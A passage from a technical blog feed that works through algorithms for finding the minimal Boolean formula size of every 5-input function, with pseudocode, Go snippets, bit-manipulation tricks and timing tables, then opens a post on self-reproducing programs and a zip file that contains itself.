<tr><td>true <td>true <td>11<sub>2</sub> = 3 </table> </center> <p class=pp> The functions are then the 4-bit numbers giving the value of the function for each input. For example, function 13 = 1101<sub>2</sub> is true for all inputs except X=false Y=true. Three-variable functions correspond to 3-bit inputs generating 8-bit truth tables, and so on. </p> <p class=pp> This representation has two key advantages. The first is that the numbering is dense, so that you can implement a map keyed by function using a simple array. 
The second is that the operations &ldquo;f AND g&rdquo; and &ldquo;f OR g&rdquo; can be implemented using bitwise operators: the truth table for &ldquo;f AND g&rdquo; is the bitwise AND of the truth tables for f and g. </p> <p class=pp> That program worked well enough in 2001 to compute the minimum number of operators necessary to write any 1-, 2-, 3-, and 4-variable Boolean function. Each round takes asymptotically O(2<sup>2<sup>n</sup></sup>&#183;2<sup>2<sup>n</sup></sup>) = O(2<sup>2<sup>n+1</sup></sup>) time, and the number of rounds needed is O(the final answer). The answer for n=4 is 15, so the computation required on the order of 15&#183;2<sup>2<sup>5</sup></sup> = 15&#183;2<sup>32</sup> iterations of the innermost loop. That was plausible on the computer I was using at the time, but the answer for n=5, likely around 30, would need 30&#183;2<sup>64</sup> iterations to compute, which seemed well out of reach. At the time, it seemed plausible that parity was always a hardest function and that the minimum size would continue to alternate between 2<sup>n</sup>&#8722;1 and 2<sup>n</sup>+1. It's a nice pattern. </p> <h3>Exploiting Symmetry</h3> <p class=pp> Five years later, though, Alex Healy and I got to talking about this sequence, and Alex shot down both conjectures using results from the theory of circuit complexity. (Theorists!) Neil Sloane added this note to the <a href="http://oeis.org/history?seq=A056287">entry for the sequence</a> in his Online Encyclopedia of Integer Sequences: </p> <blockquote> <tt> %E A056287 Russ Cox conjectures that X<sub>1</sub> XOR ... XOR X<sub>n</sub> is always a worst f and that a(5) = 33 and a(6) = 63. But (Jan 27 2006) Alex Healy points out that this conjecture is definitely false for large n. So what is a(5)? </tt> </blockquote> <p class=lp> Indeed. What is a(5)? No one knew, and it wasn't obvious how to find out. </p> <p class=pp> In January 2010, Alex and I started looking into ways to speed up the computation for a(5). 30&#183;2<sup>64</sup> is too many iterations but maybe we could find ways to cut that number. </p> <p class=pp> In general, if we can identify a class of functions f whose members are guaranteed to have the same complexity, then we can save just one representative of the class as long as we recreate the entire class in the loop body. What used to be: </p> <pre class="indent alg"> for each function f for each function g visit f AND g visit f OR g </pre> <p class=lp> can be rewritten as </p> <pre class="indent alg"> for each canonical function f for each canonical function g for each ff equivalent to f for each gg equivalent to g visit ff AND gg visit ff OR gg </pre> <p class=lp> That doesn't look like an improvement: it's doing all the same work. But it can open the door to new optimizations depending on the equivalences chosen. For example, the functions &ldquo;f&rdquo; and &ldquo;&#172;f&rdquo; are guaranteed to have the same complexity, by <a href="http://en.wikipedia.org/wiki/De_Morgan's_laws">DeMorgan's laws</a>. If we keep just one of those two on the lists that &ldquo;for each function&rdquo; iterates over, we can unroll the inner two loops, producing: </p> <pre class="indent alg"> for each canonical function f for each canonical function g visit f OR g visit f AND g visit &#172;f OR g visit &#172;f AND g visit f OR &#172;g visit f AND &#172;g visit &#172;f OR &#172;g visit &#172;f AND &#172;g </pre> <p class=lp> That's still not an improvement, but it's no worse. 
Each of the two loops considers half as many functions but the inner iteration is four times longer. Now we can notice that half of tests aren't worth doing: &ldquo;f AND g&rdquo; is the negation of &ldquo;&#172;f OR &#172;g,&rdquo; and so on, so only half of them are necessary. </p> <p class=pp> Let's suppose that when choosing between &ldquo;f&rdquo; and &ldquo;&#172;f&rdquo; we keep the one that is false when presented with all true inputs. (This has the nice property that <code>f ^ (int32(f) &gt;&gt; 31)</code> is the truth table for the canonical form of <code>f</code>.) Then we can tell which combinations above will produce canonical functions when f and g are already canonical: </p> <pre class="indent alg"> for each canonical function f for each canonical function g visit f OR g visit f AND g visit &#172;f AND g visit f AND &#172;g </pre> <p class=lp> That's a factor of two improvement over the original loop. </p> <p class=pp> Another observation is that permuting the inputs to a function doesn't change its complexity: &ldquo;f(V, W, X, Y, Z)&rdquo; and &ldquo;f(Z, Y, X, W, V)&rdquo; will have the same minimum size. For complex functions, each of the 5! = 120 permutations will produce a different truth table. A factor of 120 reduction in storage is good but again we have the problem of expanding the class in the iteration. This time, there's a different trick for reducing the work in the innermost iteration. Since we only need to produce one member of the equivalence class, it doesn't make sense to permute the inputs to both f and g. Instead, permuting just the inputs to f while fixing g is guaranteed to hit at least one member of each class that permuting both f and g would. So we gain the factor of 120 twice in the loops and lose it once in the iteration, for a net savings of 120. (In some ways, this is the same trick we did with &ldquo;f&rdquo; vs &ldquo;&#172;f.&rdquo;) </p> <p class=pp> A final observation is that negating any of the inputs to the function doesn't change its complexity, because X and X' have the same complexity. The same argument we used for permutations applies here, for another constant factor of 2<sup>5</sup> = 32. </p> <p class=pp> The code stores a single function for each equivalence class and then recomputes the equivalent functions for f, but not g. </p> <pre class="indent alg"> for each canonical function f for each function ff equivalent to f for each canonical function g visit ff OR g visit ff AND g visit &#172;ff AND g visit ff AND &#172;g </pre> <p class=lp> In all, we just got a savings of 2&#183;120&#183;32 = 7680, cutting the total number of iterations from 30&#183;2<sup>64</sup> = 5&#215;10<sup>20</sup> to 7&#215;10<sup>16</sup>. If you figure we can do around 10<sup>9</sup> iterations per second, that's still 800 days of CPU time. 
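</p> <p class=pp> Concretely, the truth-table representation and the canonicalization under negation take only a few lines of code. Here is a small Go sketch (an illustration with names of my own choosing, separate from the original program): </p> <pre>package main

import "fmt"

// A 5-input Boolean function as a 32-bit truth table: bit i holds the
// function's value on the input assignment whose binary digits are i.
type Func uint32

// Truth tables for the single-variable functions V and W.
const V, W Func = 0xaaaaaaaa, 0xcccccccc

// canon returns whichever of f and its negation is false when all five
// inputs are true, i.e. the one whose truth table has bit 31 clear.
func canon(f Func) Func { return f ^ Func(int32(f)&gt;&gt;31) }

func main() {
	fmt.Printf("V AND W = %#x\n", V&amp;W) // AND of functions is bitwise AND
	fmt.Printf("V OR  W = %#x\n", V|W) // OR of functions is bitwise OR
	fmt.Println(canon(V) == canon(^V)) // a function and its negation share one canonical form
}
</pre> <p class=pp>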
</p> <p class=pp> The full algorithm at this point is: </p> <pre class="indent alg"> // Algorithm 2 func compute(): for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 loop changed = false for each canonical function f for each function ff equivalent to f for each canonical function g d = size[ff] + 1 + size[g] changed |= visit(d, ff OR g) changed |= visit(d, ff AND g) changed |= visit(d, ff AND &#172;g) changed |= visit(d, &#172;ff AND g) if not changed return func visit(d, fg): if size[fg] != &#8734; return false record fg as canonical for each function ffgg equivalent to fg size[ffgg] = d return true </pre> <p class=lp> The helper function &ldquo;visit&rdquo; must set the size not only of its argument fg but also all equivalent functions under permutation or inversion of the inputs, so that future tests will see that they have been computed. </p> <h3>Methodical Exploration</h3> <p class=pp> There's one final improvement we can make. The approach of looping until things stop changing considers each function pair multiple times as their sizes go down. Instead, we can consider functions in order of complexity, so that the main loop builds first all the functions of minimum complexity 1, then all the functions of minimum complexity 2, and so on. If we do that, we'll consider each function pair at most once. We can stop when all functions are accounted for. </p> <p class=pp> Applying this idea to Algorithm 1 (before canonicalization) yields: </p> <pre class="indent alg"> // Algorithm 3 func compute() for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 for k = 1 to &#8734; for each function f for each function g of size k &#8722; size(f) &#8722; 1 if size[f AND g] == &#8734; size[f AND g] = k nsize++ if size[f OR g] == &#8734; size[f OR g] = k nsize++ if nsize == 2<sup>2<sup>n</sup></sup> return </pre> <p class=lp> Applying the idea to Algorithm 2 (after canonicalization) yields: </p> <pre class="indent alg"> // Algorithm 4 func compute(): for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 for k = 1 to &#8734; for each canonical function f for each function ff equivalent to f for each canonical function g of size k &#8722; size(f) &#8722; 1 visit(k, ff OR g) visit(k, ff AND g) visit(k, ff AND &#172;g) visit(k, &#172;ff AND g) if nvisited == 2<sup>2<sup>n</sup></sup> return func visit(d, fg): if size[fg] != &#8734; return record fg as canonical for each function ffgg equivalent to fg if size[ffgg] == &#8734; size[ffgg] = d nvisited += 2 // counts ffgg and &#172;ffgg return </pre> <p class=lp> The original loop in Algorithms 1 and 2 considered each pair f, g in every iteration of the loop after they were computed. The new loop in Algorithms 3 and 4 considers each pair f, g only once, when k = size(f) + size(g) + 1. This removes the leading factor of 30 (the number of times we expected the first loop to run) from our estimation of the run time. Now the expected number of iterations is around 2<sup>64</sup>/7680 = 2.4&#215;10<sup>15</sup>. If we can do 10<sup>9</sup> iterations per second, that's only 28 days of CPU time, which I can deliver if you can wait a month. </p> <p class=pp> Our estimate does not include the fact that not all function pairs need to be considered. For example, if the maximum size is 30, then the functions of size 14 need never be paired against the functions of size 16, because any result would have size 14+1+16 = 31.
So even 2.4&#215;10<sup>15</sup> is an overestimate, but it's in the right ballpark. (With hindsight I can report that only 1.7&#215;10<sup>14</sup> pairs need to be considered but also that our estimate of 10<sup>9</sup> iterations per second was optimistic. The actual calculation ran for 20 days, an average of about 10<sup>8</sup> iterations per second.) </p> <h3>Endgame: Directed Search</h3> <p class=pp> A month is still a long time to wait, and we can do better. Near the end (after k is bigger than, say, 22), we are exploring the fairly large space of function pairs in hopes of finding a fairly small number of remaining functions. At that point it makes sense to change from the bottom-up &ldquo;bang things together and see what we make&rdquo; to the top-down &ldquo;try to make this one of these specific functions.&rdquo; That is, the core of the current search is: </p> <pre class="indent alg"> for each canonical function f for each function ff equivalent to f for each canonical function g of size k &#8722; size(f) &#8722; 1 visit(k, ff OR g) visit(k, ff AND g) visit(k, ff AND &#172;g) visit(k, &#172;ff AND g) </pre> <p class=lp> We can change it to: </p> <pre class="indent alg"> for each missing function fg for each canonical function g for all possible f such that one of these holds * fg = f OR g * fg = f AND g * fg = &#172;f AND g * fg = f AND &#172;g if size[f] == k &#8722; size(g) &#8722; 1 visit(k, fg) next fg </pre> <p class=lp> By the time we're at the end, exploring all the possible f to make the missing functions&#8212;a directed search&#8212;is much less work than the brute force of exploring all combinations. </p> <p class=pp> As an example, suppose we are looking for f such that fg = f OR g. The equation is only possible to satisfy if fg OR g == fg. That is, if g has any extraneous 1 bits, no f will work, so we can move on. Otherwise, the remaining condition is that f AND &#172;g == fg AND &#172;g. That is, for the bit positions where g is 0, f must match fg. The other bits of f (the bits where g has 1s) can take any value. We can enumerate the possible f values by recursively trying all possible values for the &ldquo;don't care&rdquo; bits. </p> <pre class="indent alg"> func find(x, any, xsize): if size(x) == xsize return x while any != 0 bit = any AND &#8722;any // rightmost 1 bit in any any = any AND &#172;bit if f = find(x OR bit, any, xsize) succeeds return f return failure </pre> <p class=lp> It doesn't matter which 1 bit we choose for the recursion, but finding the rightmost 1 bit is cheap: it is isolated by the (admittedly surprising) expression &ldquo;any AND &#8722;any.&rdquo; </p> <p class=pp> Given <code>find</code>, the loop above can try these four cases: </p> <center> <table id=find> <tr><th>Formula <th>Condition <th>Base x <th>&ldquo;Any&rdquo; bits <tr><td>fg = f OR g <td>fg OR g == fg <td>fg AND &#172;g <td>g <tr><td>fg = f OR &#172;g <td>fg OR &#172;g == fg <td>fg AND g <td>&#172;g <tr><td>&#172;fg = f OR g <td>&#172;fg OR g == &#172;fg <td>&#172;fg AND &#172;g <td>g <tr><td>&#172;fg = f OR &#172;g <td>&#172;fg OR &#172;g == &#172;fg <td>&#172;fg AND g <td>&#172;g </table> </center> <p class=lp> Rewriting the Boolean expressions to use only the four OR forms means that we only need to write the &ldquo;adding bits&rdquo; version of find. </p> <p class=pp> The final algorithm is: </p> <pre class="indent alg"> // Algorithm 5 func compute(): for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 // Generate functions.
for k = 1 to max_generate for each canonical function f for each function ff equivalent to f for each canonical function g of size k &#8722; size(f) &#8722; 1 visit(k, ff OR g) visit(k, ff AND g) visit(k, ff AND &#172;g) visit(k, &#172;ff AND g) // Search for functions. for k = max_generate+1 to &#8734; for each missing function fg for each canonical function g fsize = k &#8722; size(g) &#8722; 1 if fg OR g == fg if f = find(fg AND &#172;g, g, fsize) succeeds visit(k, fg) next fg if fg OR &#172;g == fg if f = find(fg AND g, &#172;g, fsize) succeeds visit(k, fg) next fg if &#172;fg OR g == &#172;fg if f = find(&#172;fg AND &#172;g, g, fsize) succeeds visit(k, fg) next fg if &#172;fg OR &#172;g == &#172;fg if f = find(&#172;fg AND g, &#172;g, fsize) succeeds visit(k, fg) next fg if nvisited == 2<sup>2<sup>n</sup></sup> return func visit(d, fg): if size[fg] != &#8734; return record fg as canonical for each function ffgg equivalent to fg if size[ffgg] == &#8734; size[ffgg] = d nvisited += 2 // counts ffgg and &#172;ffgg return func find(x, any, xsize): if size(x) == xsize return x while any != 0 bit = any AND &#8722;any // rightmost 1 bit in any any = any AND &#172;bit if f = find(x OR bit, any, xsize) succeeds return f return failure </pre> <p class=lp> To get a sense of the speedup here, and to check my work, I ran the program using both algorithms on a 2.53 GHz Intel Core 2 Duo E7200. </p> <center> <table id=times> <tr><th> <th colspan=3>&#8212;&#8212;&#8212;&#8212;&#8212; # of Functions &#8212;&#8212;&#8212;&#8212;&#8212;<th colspan=2>&#8212;&#8212;&#8212;&#8212; Time &#8212;&#8212;&#8212;&#8212; <tr><th>Size <th>Canonical <th>All <th>All, Cumulative <th>Generate <th>Search <tr><td>0 <td>1 <td>10 <td>10 <tr><td>1 <td>2 <td>82 <td>92 <td>&lt; 0.1 seconds <td>3.4 minutes <tr><td>2 <td>2 <td>640 <td>732 <td>&lt; 0.1 seconds <td>7.2 minutes <tr><td>3 <td>7 <td>4420 <td>5152 <td>&lt; 0.1 seconds <td>12.3 minutes <tr><td>4 <td>19 <td>25276 <td>29696 <td>&lt; 0.1 seconds <td>30.1 minutes <tr><td>5 <td>44 <td>117440 <td>147136 <td>&lt; 0.1 seconds <td>1.3 hours <tr><td>6 <td>142 <td>515040 <td>662176 <td>&lt; 0.1 seconds <td>3.5 hours <tr><td>7 <td>436 <td>1999608 <td>2661784 <td>0.2 seconds <td>11.6 hours <tr><td>8 <td>1209 <td>6598400 <td>9260184 <td>0.6 seconds <td>1.7 days <tr><td>9 <td>3307 <td>19577332 <td>28837516 <td>1.7 seconds <td>4.9 days <tr><td>10 <td>7741 <td>50822560 <td>79660076 <td>4.6 seconds <td>[ 10 days ? ] <tr><td>11 <td>17257 <td>114619264 <td>194279340 <td>10.8 seconds <td>[ 20 days ? ] <tr><td>12 <td>31851 <td>221301008 <td>415580348 <td>21.7 seconds <td>[ 50 days ? ] <tr><td>13 <td>53901 <td>374704776 <td>790285124 <td>38.5 seconds <td>[ 80 days ? ] <tr><td>14 <td>75248 <td>533594528 <td>1323879652 <td>58.7 seconds <td>[ 100 days ? ] <tr><td>15 <td>94572 <td>667653642 <td>1991533294 <td>1.5 minutes <td>[ 120 days ? ] <tr><td>16 <td>98237 <td>697228760 <td>2688762054 <td>2.1 minutes <td>[ 120 days ? ] <tr><td>17 <td>89342 <td>628589440 <td>3317351494 <td>4.1 minutes <td>[ 90 days ? ] <tr><td>18 <td>66951 <td>468552896 <td>3785904390 <td>9.1 minutes <td>[ 50 days ? ] <tr><td>19 <td>41664 <td>287647616 <td>4073552006 <td>23.4 minutes <td>[ 30 days ? ] <tr><td>20 <td>21481 <td>144079832 <td>4217631838 <td>57.0 minutes <td>[ 10 days ?
] <tr><td>21 <td>8680 <td>55538224 <td>4273170062 <td>2.4 hours <td>2.5 days <tr><td>22 <td>2730 <td>16099568 <td>4289269630 <td>5.2 hours <td>11.7 hours <tr><td>23 <td>937 <td>4428800 <td>4293698430 <td>11.2 hours <td>2.2 hours <tr><td>24 <td>228 <td>959328 <td>4294657758 <td>22.0 hours <td>33.2 minutes <tr><td>25 <td>103 <td>283200 <td>4294940958 <td>1.7 days <td>4.0 minutes <tr><td>26 <td>21 <td>22224 <td>4294963182 <td>2.9 days <td>42 seconds <tr><td>27 <td>10 <td>3602 <td>4294966784 <td>4.7 days <td>2.4 seconds <tr><td>28 <td>3 <td>512 <td>4294967296 <td>[ 7 days ? ] <td>0.1 seconds </table> </center> <p class=pp> The bracketed times are estimates based on the work involved: I did not wait that long for the intermediate search steps. The search algorithm is quite a bit worse than generate until there are very few functions left to find. However, it comes in handy just when it is most useful: when the generate algorithm has slowed to a crawl. If we run generate through formulas of size 22 and then switch to search for 23 onward, we can run the whole computation in just over half a day of CPU time. </p> <p class=pp> The computation of a(5) identified the sizes of all 616,126 canonical Boolean functions of 5 inputs. In contrast, there are <a href="http://oeis.org/A000370">just over 200 trillion canonical Boolean functions of 6 inputs</a>. Determining a(6) is unlikely to happen by brute force computation, no matter what clever tricks we use. </p> <h3>Adding XOR</h3> <p class=pp>We've assumed the use of just AND and OR as our basis for the Boolean formulas. If we also allow XOR, functions can be written using many fewer operators. In particular, a hardest function for the 1-, 2-, 3-, and 4-input cases&#8212;parity&#8212;is now trivial. Knuth examines the complexity of 5-input Boolean functions using AND, OR, and XOR in detail in <a href="http://www-cs-faculty.stanford.edu/~uno/taocp.html">The Art of Computer Programming, Volume 4A</a>. Section 7.1.2's Algorithm L is the same as our Algorithm 3 above, given for computing 4-input functions. Knuth mentions that to adapt it for 5-input functions one must treat only canonical functions and gives results for 5-input functions with XOR allowed. So another way to check our work is to add XOR to our Algorithm 4 and check that our results match Knuth's. 
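</p> <p class=pp> In the truth-table representation, XOR costs no more than AND or OR: it is simply the bitwise XOR of the two tables. Negating either input of an XOR only negates the result, so the four sign variants of f XOR g collapse to a single function up to negation, and one way to extend Algorithm 4's inner loop is a single extra visit(k, ff XOR g) per pair. The little Go program below checks those identities; it is an illustration, not the program used for the computation: </p> <pre>package main

import "fmt"

func main() {
	// Truth tables for the single-variable functions V and W.
	const V, W uint32 = 0xaaaaaaaa, 0xcccccccc

	// XOR of functions is bitwise XOR of truth tables.
	fmt.Printf("V XOR W = %#x\n", V^W)

	// Negating an input just negates the result, so all four sign
	// variants of f XOR g are the same function up to negation.
	fmt.Println(^V^W == ^(V^W), V^^W == ^(V^W), ^V^^W == V^W)
}
</pre> <p class=pp>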
</p> <p class=pp> Because the minimum formula sizes are smaller (at most 12), the computation of sizes with XOR is much faster than before: </p> <center> <table> <tr><th> <th><th colspan=5>&#8212;&#8212;&#8212;&#8212;&#8212; # of Functions &#8212;&#8212;&#8212;&#8212;&#8212;<th> <tr><th>Size <th width=10><th>Canonical <th width=10><th>All <th width=10><th>All, Cumulative <th width=10><th>Time <tr><td align=right>0 <td><td align=right>1 <td><td align=right>10 <td><td align=right>10 <td><td> <tr><td align=right>1 <td><td align=right>3 <td><td align=right>102 <td><td align=right>112 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>2 <td><td align=right>5 <td><td align=right>1140 <td><td align=right>1252 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>3 <td><td align=right>20 <td><td align=right>11570 <td><td align=right>12822 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>4 <td><td align=right>93 <td><td align=right>109826 <td><td align=right>122648 <td><td align=right>&lt; 0.1 seconds <tr><td align=right>5 <td><td align=right>366 <td><td align=right>936440 <td><td align=right>1059088 <td><td align=right>0.1 seconds <tr><td align=right>6 <td><td align=right>1730 <td><td align=right>7236880 <td><td align=right>8295968 <td><td align=right>0.7 seconds <tr><td align=right>7 <td><td align=right>8782 <td><td align=right>47739088 <td><td align=right>56035056 <td><td align=right>4.5 seconds <tr><td align=right>8 <td><td align=right>40297 <td><td align=right>250674320 <td><td align=right>306709376 <td><td align=right>24.0 seconds <tr><td align=right>9 <td><td align=right>141422 <td><td align=right>955812256 <td><td align=right>1262521632 <td><td align=right>95.5 seconds <tr><td align=right>10 <td><td align=right>273277 <td><td align=right>1945383936 <td><td align=right>3207905568 <td><td align=right>200.7 seconds <tr><td align=right>11 <td><td align=right>145707 <td><td align=right>1055912608 <td><td align=right>4263818176 <td><td align=right>121.2 seconds <tr><td align=right>12 <td><td align=right>4423 <td><td align=right>31149120 <td><td align=right>4294967296 <td><td align=right>65.0 seconds </table> </center> <p class=pp> Knuth does not discuss anything like Algorithm 5, because the search for specific functions does not apply to the AND, OR, and XOR basis. XOR is a non-monotone function (it can both turn bits on and turn bits off), so there is no test like our &ldquo;<code>if fg OR g == fg</code>&rdquo; and no small set of &ldquo;don't care&rdquo; bits to trim the search for f. The search for an appropriate f in the XOR case would have to try all f of the right size, which is exactly what Algorithm 4 already does. </p> <p class=pp> Volume 4A also considers the problem of building minimal circuits, which are like formulas but can use common subexpressions additional times for free, and the problem of building the shallowest possible circuits. See Section 7.1.2 for all the details. </p> <h3>Code and Web Site</h3> <p class=pp> The web site <a href="http://boolean-oracle.swtch.com">boolean-oracle.swtch.com</a> lets you type in a Boolean expression and gives back the minimal formula for it. It uses tables generated while running Algorithm 5; those tables and the programs described in this post are also <a href="http://boolean-oracle.swtch.com/about">available on the site</a>. 
</p> <h3>Postscript: Generating All Permutations and Inversions</h3> <p class=pp> The algorithms given above depend crucially on the step &ldquo;<code>for each function ff equivalent to f</code>,&rdquo; which generates all the ff obtained by permuting or inverting inputs to f, but I did not explain how to do that. We already saw that we can manipulate the binary truth table representation directly to turn <code>f</code> into <code>&#172;f</code> and to compute combinations of functions. We can also manipulate the binary representation directly to invert a specific input or swap a pair of adjacent inputs. Using those operations we can cycle through all the equivalent functions. </p> <p class=pp> To invert a specific input, let's consider the structure of the truth table. The index of a bit in the truth table encodes the inputs for that entry. For example, the low bit of the index gives the value of the first input. So the even-numbered bits&#8212;at indices 0, 2, 4, 6, ...&#8212;correspond to the first input being false, while the odd-numbered bits&#8212;at indices 1, 3, 5, 7, ...&#8212;correspond to the first input being true. Changing just that bit in the index corresponds to changing the single variable, so indices 0, 1 differ only in the value of the first input, as do 2, 3, and 4, 5, and 6, 7, and so on. Given the truth table for f(V, W, X, Y, Z) we can compute the truth table for f(&#172;V, W, X, Y, Z) by swapping adjacent bit pairs in the original truth table. Even better, we can do all the swaps in parallel using a bitwise operation. To invert a different input, we swap larger runs of bits. </p> <center> <table> <tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>) <tr><td>f(&#172;V, W, X, Y, Z) <td><td><code>(f&amp;0x55555555)&lt;&lt;&nbsp;1 | (f&gt;&gt;&nbsp;1)&amp;0x55555555</code> <tr><td>f(V, &#172;W, X, Y, Z) <td><td><code>(f&amp;0x33333333)&lt;&lt;&nbsp;2 | (f&gt;&gt;&nbsp;2)&amp;0x33333333</code> <tr><td>f(V, W, &#172;X, Y, Z) <td><td><code>(f&amp;0x0f0f0f0f)&lt;&lt;&nbsp;4 | (f&gt;&gt;&nbsp;4)&amp;0x0f0f0f0f</code> <tr><td>f(V, W, X, &#172;Y, Z) <td><td><code>(f&amp;0x00ff00ff)&lt;&lt;&nbsp;8 | (f&gt;&gt;&nbsp;8)&amp;0x00ff00ff</code> <tr><td>f(V, W, X, Y, &#172;Z) <td><td><code>(f&amp;0x0000ffff)&lt;&lt;16 | (f&gt;&gt;16)&amp;0x0000ffff</code> </table> </center> <p class=lp> Being able to invert a specific input lets us consider all possible inversions by building them up one at a time. The <a href="http://oeis.org/A003188">Gray code</a> lets us enumerate all possible 5-bit input codes while changing only 1 bit at a time as we move from one input to the next: </p> <center> 0, 1, 3, 2, 6, 7, 5, 4, <br> 12, 13, 15, 14, 10, 11, 9, 8, <br> 24, 25, 27, 26, 30, 31, 29, 28, <br> 20, 21, 23, 22, 18, 19, 17, 16 </center> <p class=lp> This minimizes the number of inversions we need: to consider all 32 cases, we only need 31 inversion operations. In contrast, visiting the 5-bit input codes in the usual binary order 0, 1, 2, 3, 4, ... would often need to change multiple bits, like when changing from 3 to 4. </p> <p class=pp> To swap a pair of adjacent inputs, we can again take advantage of the truth table. For a pair of inputs, there are four cases: 00, 01, 10, and 11. We can leave the 00 and 11 cases alone, because they are invariant under swapping, and concentrate on swapping the 01 and 10 bits. The first two inputs change most often in the truth table: each run of 4 bits corresponds to those four cases. 
In each run, we want to leave the first and fourth alone and swap the second and third. For later inputs, the four cases consist of sections of bits instead of single bits. </p> <center> <table> <tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>) <tr><td>f(<b>W, V</b>, X, Y, Z) <td><td><code>f&amp;0x99999999 | (f&amp;0x22222222)&lt;&lt;1 | (f&gt;&gt;1)&amp;0x22222222</code> <tr><td>f(V, <b>X, W</b>, Y, Z) <td><td><code>f&amp;0xc3c3c3c3 | (f&amp;0x0c0c0c0c)&lt;&lt;1 | (f&gt;&gt;1)&amp;0x0c0c0c0c</code> <tr><td>f(V, W, <b>Y, X</b>, Z) <td><td><code>f&amp;0xf00ff00f | (f&amp;0x00f000f0)&lt;&lt;1 | (f&gt;&gt;1)&amp;0x00f000f0</code> <tr><td>f(V, W, X, <b>Z, Y</b>) <td><td><code>f&amp;0xff0000ff | (f&amp;0x0000ff00)&lt;&lt;8 | (f&gt;&gt;8)&amp;0x0000ff00</code> </table> </center> <p class=lp> Being able to swap a pair of adjacent inputs lets us consider all possible permutations by building them up one at a time. Again it is convenient to have a way to visit all permutations by applying only one swap at a time. Here Volume 4A comes to the rescue. Section 7.2.1.2 is titled &ldquo;Generating All Permutations,&rdquo; and Knuth delivers many algorithms to do just that. The most convenient for our purposes is Algorithm P, which generates a sequence that considers all permutations exactly once with only a single swap of adjacent inputs between steps. Knuth calls it Algorithm P because it corresponds to the &ldquo;Plain changes&rdquo; algorithm used by <a href="http://en.wikipedia.org/wiki/Change_ringing">bell ringers in 17th century England</a> to ring a set of bells in all possible permutations. The algorithm is described in a manuscript written around 1653! </p> <p class=pp> We can examine all possible permutations and inversions by nesting a loop over all permutations inside a loop over all inversions, and in fact that's what my program does. Knuth does one better, though: his Exercise 7.2.1.2-20 suggests that it is possible to build up all the possibilities using only adjacent swaps and inversion of the first input. Negating arbitrary inputs is not hard, though, and still does minimal work, so the code sticks with Gray codes and Plain changes. </p></p> Zip Files All The Way Down tag:research.swtch.com,2012:research.swtch.com/zip 2010-03-18T00:00:00-04:00 2010-03-18T00:00:00-04:00 Did you think it was turtles? <p><p class=lp> Stephen Hawking begins <i><a href="http://www.amazon.com/-/dp/0553380168">A Brief History of Time</a></i> with this story: </p> <blockquote> <p class=pp> A well-known scientist (some say it was Bertrand Russell) once gave a public lecture on astronomy. He described how the earth orbits around the sun and how the sun, in turn, orbits around the center of a vast collection of stars called our galaxy. At the end of the lecture, a little old lady at the back of the room got up and said: &ldquo;What you have told us is rubbish. The world is really a flat plate supported on the back of a giant tortoise.&rdquo; The scientist gave a superior smile before replying, &ldquo;What is the tortoise standing on?&rdquo; &ldquo;You're very clever, young man, very clever,&rdquo; said the old lady. &ldquo;But it's turtles all the way down!&rdquo; </p> </blockquote> <p class=lp> Scientists today are pretty sure that the universe is not actually turtles all the way down, but we can create that kind of situation in other contexts. 
For example, here we have <a href="http://www.youtube.com/watch?v=Y-gqMTt3IUg">video monitors all the way down</a> and <a href="http://www.amazon.com/gp/customer-media/product-gallery/0387900926/ref=cm_ciu_pdp_images_all">set theory books all the way down</a>, and <a href="http://blog.makezine.com/archive/2009/01/thousands_of_shopping_carts_stake_o.html">shopping carts all the way down</a>. </p> <p class=pp> And here's a computer storage equivalent: look inside <a href="http://swtch.com/r.zip"><code>r.zip</code></a>. It's zip files all the way down: each one contains another zip file under the name <code>r/r.zip</code>. (For the die-hard Unix fans, <a href="http://swtch.com/r.tar.gz"><code>r.tar.gz</code></a> is gzipped tar files all the way down.) Like the line of shopping carts, it never ends, because it loops back onto itself: the zip file contains itself! And it's probably less work to put together a self-reproducing zip file than to put together all those shopping carts, at least if you're the kind of person who would read this blog. This post explains how. </p> <p class=pp> Before we get to self-reproducing zip files, though, we need to take a brief detour into self-reproducing programs. </p> <h3>Self-reproducing programs</h3> <p class=pp> The idea of self-reproducing programs dates back to the 1960s. My favorite statement of the problem is the one Ken Thompson gave in his 1983 Turing Award address: </p> <blockquote> <p class=pp> In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular. </p> <p class=pp> More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about &ldquo;shortest&rdquo; was just an incentive to demonstrate skill and determine a winner. </p> </blockquote> <p class=lp> <b>Spoiler alert!</b> I agree: if you have never done this, I urge you to try it on your own. The internet makes it so easy to look things up that it's refreshing to discover something yourself once in a while. Go ahead and spend a few days figuring out. This blog will still be here when you get back. (If you don't mind the spoilers, the entire <a href="http://cm.bell-labs.com/who/ken/trust.html">Turing award address</a> is worth reading.) </p> <center> <br><br> <i>(Spoiler blocker.)</i> <br> <a href="http://www.robertwechsler.com/projects.html"><img src="http://research.swtch.com/applied_geometry.jpg"></a> <br> <i><a href="http://www.robertwechsler.com/projects.html">http://www.robertwechsler.com/projects.html</a></i> <br><br> </center> <p class=pp> Let's try to write a Python program that prints itself. It will probably be a <code>print</code> statement, so here's a first attempt, run at the interpreter prompt: </p> <pre class=indent> &gt;&gt;&gt; print '<span style="color: #005500">hello</span>' hello </pre> <p class=lp> That didn't quite work. 
